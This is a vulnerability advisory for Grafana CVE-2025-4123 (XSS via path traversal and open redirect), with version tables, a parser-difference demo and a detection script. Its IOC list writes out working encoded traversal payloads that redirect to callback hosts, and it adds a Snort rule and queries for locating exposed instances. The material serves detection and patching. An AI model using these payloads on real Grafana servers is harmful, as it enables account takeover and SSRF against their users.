CVE-2025-4123
published 2025-05-22


Priority: P2 (78)
Severity: medium, 6.1 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Flags: ITW, EXPLOIT, VulnCheck KEV (exploited in the wild)
EPSS: 97.81% (99.9th percentile)
A cross-site scripting (XSS) vulnerability exists in Grafana, caused by combining a client-side path traversal with an open redirect. It allows attackers to redirect users to a website that hosts a frontend plugin which then executes arbitrary JavaScript. The vulnerability does not require editor permissions, and if anonymous access is enabled the XSS works without any authentication. If the Grafana Image Renderer plugin is installed, the open redirect can be exploited to achieve a full-read SSRF. Grafana's default Content-Security-Policy (CSP) blocks the XSS through the `connect-src` directive.
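The chain described above, as an added illustration for this page (Node.js code written here, not Grafana's code and not taken from the advisory sources): it percent-decodes the single-encoded path from the IOC list further down, cleans it the way a path-based server would, and then resolves the same string the way a WHATWG-compliant browser resolves a Location header. The origin grafana.example is assumed; oast.pro is the callback host that appears in the page's IOCs.

```javascript
// Added example for this page (Node.js); not Grafana code and not from the advisory
// sources. Demonstrates the chain in the description: a percent-encoded
// "..%2F%5C<host>" sequence that a path-based server treats as a file name but a
// WHATWG-compliant browser treats as an authority.
// Assumptions: the Grafana origin https://grafana.example; oast.pro is the callback
// host taken from the page's IOC list.

const ENCODED_PATH = "/public/..%2F%5coast.pro%2F%3f%2F..%2F..";

// Percent-decode repeatedly and return every layer. The IOCs on this page use
// both single (%2F%5C) and double (%252f%255C) encoding; double-encoded input
// needs two passes to reach the same plaintext.
function decodeLayers(path, maxLayers = 3) {
  const layers = [path];
  for (let i = 0; i < maxLayers; i++) {
    const last = layers[layers.length - 1];
    let next;
    try { next = decodeURIComponent(last); } catch { break; }
    if (next === last) break;
    layers.push(next);
  }
  return layers;
}

// POSIX-style cleaning as a Go or Node server does it: only "/" separates
// segments, ".." pops one segment, and "\oast.pro" is just an odd file name.
// Everything from the first "?" on is query string and is left alone.
function serverSideResolve(decodedPath) {
  const q = decodedPath.indexOf("?");
  const pathPart = q === -1 ? decodedPath : decodedPath.slice(0, q);
  const query = q === -1 ? "" : decodedPath.slice(q);
  const out = [];
  for (const seg of pathPart.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  const trailing = pathPart.endsWith("/") && out.length ? "/" : "";
  return "/" + out.join("/") + trailing + query;
}

// What the victim's browser does with that same string in a Location header:
// in https URLs a backslash is a slash, so "/\oast.pro/" is the protocol-relative
// URL "//oast.pro/" and the navigation leaves the Grafana origin.
function browserResolve(location, origin = "https://grafana.example") {
  return new URL(location, origin);
}

function demo(encodedPath = ENCODED_PATH) {
  const layers = decodeLayers(encodedPath);
  const decoded = layers[layers.length - 1];      // /public/../\oast.pro/?/../..
  const serverView = serverSideResolve(decoded);  // /\oast.pro/?/../..  (still a local path)
  const browserView = browserResolve(serverView); // https://oast.pro/?/../..
  return { decoded, serverView, host: browserView.host, href: browserView.href };
}

console.log(demo());
```

The contrast is the whole bug class: the server never sees a host in that string, only a strange file name, while the browser that receives it in a 302 treats the backslash as a path separator and lands on the attacker's origin. Python's urllib, for comparison, behaves like the server side here, which is why a server-side "is this redirect local?" check written with a non-WHATWG parser passes the payload.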

Affected

22 ranges

Vendor | Product | Version range | Fixed in
github.com | grafana_grafana | >= 0 < 0.0.0-20250521183405-c7a690348df7 | 0.0.0-20250521183405-c7a690348df7
grafana | grafana | < 10.4.18 | 10.4.18
grafana | grafana | (7 rows whose version data is not present in the extracted page) |
grafana | grafana | >= 10.4.18+security-01 < 10.4.19 | 10.4.19
grafana | grafana | >= 11.2.0 < 11.2.9 | 11.2.9
grafana | grafana | >= 11.2.9+security-01 < 11.2.10 | 11.2.10
grafana | grafana | >= 11.3.0 < 11.3.6 | 11.3.6
grafana | grafana | >= 11.3.6+security-01 < 11.3.7 | 11.3.7
grafana | grafana | >= 11.4.0 < 11.4.4 | 11.4.4
grafana | grafana | >= 11.4.4+security-01 < 11.4.5 | 11.4.5
grafana | grafana | >= 11.5.0 < 11.5.4 | 11.5.4
grafana | grafana | >= 11.5.4+security-01 < 11.5.5 | 11.5.5
grafana | grafana | >= 11.6.0 < 11.6.1 | 11.6.1
grafana | grafana | >= 11.6.1+security-01 < 11.6.2 | 11.6.2
grafana | grafana | >= 12.0.0+security-01 < 12.0.1 | 12.0.1
msrc | cbl2_podman_on_cbl_mariner_2.0 | |

Detection & IOCs (extracted from sources)

url: GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
path: /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f..
path: /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F..
cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
path: /public/..%2F%5coast.pro%2F%3f%2F..%2F..
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1;)
  • Detect URL-encoded path traversal sequences aimed at /public/ or /render/public/: look for the double-encoded %252f and %255C and the single-encoded %2F%5C patterns in the HTTP URI, which indicate a client-side path traversal chained with the open redirect.
  • Monitor for HTTP 302 responses from Grafana whose Location header contains a backslash-prefixed external hostname (e.g., /\<external-host>/?/), the hallmark of a successful open redirect.
  • Alert on a redirect_to cookie that contains double-encoded path traversal together with an external OAST/DNS callback domain; this indicates active exploitation or probing.
  • For SSRF detection, correlate outbound DNS/HTTP requests from the Grafana server to unexpected external hosts with inbound requests to /render/public/ that contain traversal sequences; SSRF is confirmed when an image/png response is returned together with an interactsh/DNS callback hit.
  • Use the Shodan query `product:"Grafana"` or the FOFA query `app="Grafana"` to identify exposed instances for asset inventory and patch prioritization.
  • The M2 Snort rule targets the /a/<plugin>/explore URL pattern combined with path traversal in the raw URI; monitor GET requests to /a/ endpoints that include /explore HTTP/ and backslash-encoded traversal sequences.
  • The default Grafana Content-Security-Policy (CSP) blocks the XSS through the connect-src directive but does NOT fully prevent exploitation: CSP is enforced only on the client, so the open redirect and the SSRF chain remain exploitable.
  • If anonymous access is enabled in Grafana, the XSS requires NO authentication at all, which significantly widens the attack surface.
  • If the Grafana Image Renderer plugin is installed, the open redirect can be escalated to a full-read SSRF, giving access to internal services and cloud metadata endpoints.
  • The plugin feature required for the XSS is enabled by default in Grafana, so most unpatched instances are exploitable without any configuration change.
  • Exploitation requires user interaction (the victim must open a crafted link) while holding an active Grafana session, or anonymous access must be enabled; there is no zero-click path.
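The detection notes above, turned into a small checker as an added example for this page (Node.js code written here; not from the page's sources and not a vendor rule). It applies the Snort rule's decode-once-then-match logic to the URI, checks the Location header of 302 responses, inspects the redirect_to cookie, and flags the /render/public/ plus image/png combination the SSRF note describes, all over constructed request records. The record shape is an assumption; map its fields onto whatever your proxy or Grafana access log emits.

```javascript
// Added detection example for this page (Node.js); not from the page's sources and
// not a vendor rule. It applies the checks from the notes above to constructed
// request records. The record shape {uri, status, location, cookies, respContentType}
// is an assumption: map it onto your proxy or Grafana access-log fields.

// Mirror of the Snort rule: decode the URI once (url_decode), find "/public/", then
// require traversal characters (".", "/", %2e/%2f or their %25-escaped forms)
// followed by a backslash or its %5c / %255c encoding. The optional "25" is what
// catches the double-encoded variant after a single decode.
const TRAVERSAL_AFTER_PUBLIC = /\/public\/(?:\.|\/|%(?:25)?2[eEfF])+(?:\\|%(?:25)?5[cC])/;

// Location value of a successful open redirect: "/\<host>/?/..." as described above.
const BACKSLASH_REDIRECT = /^\/\\[^\/?#]+\/?\?\//;

function decodeOnce(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

function cookieValue(cookies, name) {
  const m = (cookies || "").match(new RegExp("(?:^|;\\s*)" + name + "=([^;]*)"));
  return m ? m[1] : null;
}

function checkRecord(rec) {
  const findings = [];
  const uri = decodeOnce(rec.uri || "");
  if (TRAVERSAL_AFTER_PUBLIC.test(uri)) {
    findings.push("traversal followed by backslash after /public/ in URI");
  }
  if (rec.status === 302 && BACKSLASH_REDIRECT.test(rec.location || "")) {
    findings.push("302 whose Location starts with a backslash-prefixed host");
  }
  // The cookie carries one more encoding layer than the path (%25252f in the IOC),
  // so after one decode it looks like the double-encoded URI form and the same
  // regex applies.
  const rt = cookieValue(rec.cookies, "redirect_to");
  if (rt !== null && TRAVERSAL_AFTER_PUBLIC.test(decodeOnce(rt))) {
    findings.push("redirect_to cookie carries encoded traversal");
  }
  if (uri.startsWith("/render/public/") && TRAVERSAL_AFTER_PUBLIC.test(uri)
      && rec.respContentType === "image/png") {
    findings.push("image/png rendered for a traversal path under /render/public/: possible SSRF via image renderer");
  }
  return findings;
}

function scan(records) {
  return records
    .map((r, i) => ({ index: i, uri: r.uri, findings: checkRecord(r) }))
    .filter(x => x.findings.length > 0);
}

// Constructed records. The first three reuse the encoded paths from the IOC list
// (interactsh placeholder replaced with the page's oast.pro domain); the last two
// are benign Grafana traffic.
const SAMPLE_RECORDS = [
  { uri: "/public/..%2F%5coast.pro%2F%3f%2F..%2F..", status: 302,
    location: "/\\oast.pro/?/../..", cookies: "", respContentType: "text/html" },
  { uri: "/render/public/..%252f%255Coast.pro%252f%253F%252f..%252f..", status: 200,
    location: "", cookies: "grafana_session=abc", respContentType: "image/png" },
  { uri: "/login", status: 200, location: "",
    cookies: "redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Coast.pro%25252f%25253F%25252f..%25252f..; grafana_session=abc",
    respContentType: "text/html" },
  { uri: "/public/build/grafana.app.js", status: 200, location: "", cookies: "", respContentType: "application/javascript" },
  { uri: "/login", status: 302, location: "/?orgId=1", cookies: "", respContentType: "text/html" },
];

console.log(scan(SAMPLE_RECORDS));
```

Decoding exactly once before matching is deliberate: it keeps the checker equivalent to the Snort rule, and the optional `%25` in the pattern covers the second encoding layer without a loop that a malformed sequence could abuse. The image/png check only confirms the renderer produced something; the SSRF note's second half, the outbound DNS or HTTP callback, has to come from egress logs and is not modelled here.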

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv | | 6.1 | MEDIUM |
vulncheck | | 7.6 | HIGH |
vendor_redhat | | 7.6 | HIGH |
vendor_msrc | | 3.3 | LOW |